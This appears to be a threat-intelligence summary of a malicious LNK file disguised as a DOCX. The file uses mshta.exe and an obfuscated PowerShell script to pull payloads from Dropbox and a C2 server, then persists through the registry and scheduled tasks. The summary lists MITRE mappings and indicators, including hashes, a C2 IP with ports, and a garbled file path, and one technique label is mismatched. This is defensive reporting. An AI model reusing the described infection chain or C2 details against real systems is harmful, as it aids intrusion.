A detailed analysis of a malicious LNK file that executes a PowerShell script to download additional malware. The analysis reveals the structure of the LNK file, the payload it carries, and the indicators of compromise associated with it. The piece emphasizes the importance of understanding the attributes of the malicious file and the steps taken by the attacker to execute their plan. Affected: LNK files, PowerShell, Malware
Keypoints :
- A malicious LNK file mimics a DOCX file and executes mshta.exe.
- It creates a PowerShell script (n.ps1) that is obfuscated.
- The script downloads elements from Dropbox and C2 servers.
- Registry modifications and Task Scheduler entries are used for persistence.
- Indicators of Compromise (IoCs) have been identified related to the malware, including files, IP addresses, and registry paths.
MITRE Techniques :
- Command and Control (T1071) – The malware establishes a connection to a remote server to download additional payloads.
- Malicious File Execution (T1203) – The LNK file executes commands that fetch and execute scripts from malicious sources.
- Persistence (T1547) – Modifies the Windows Registry for automatic execution upon system startup.
- Scheduled Task/Job (T1053) – Creates tasks in the Task Scheduler to ensure continued execution of malicious scripts.
Indicator of Compromise :
- [SHA256] 563a1cfd8788542cc19db91a52b87540e9ff2512f3e78c855ffa243b0b530a5
- [SHA256] b54fdd6e637315cb0a24a9b1ae5563cab13a48d8e26fd4ec006a11bd004efd4e
- [IP Address] 64.20.59.148:8855
- [IP Address] 64.20.59.148:6699
- [Path] c:programdatan.ps1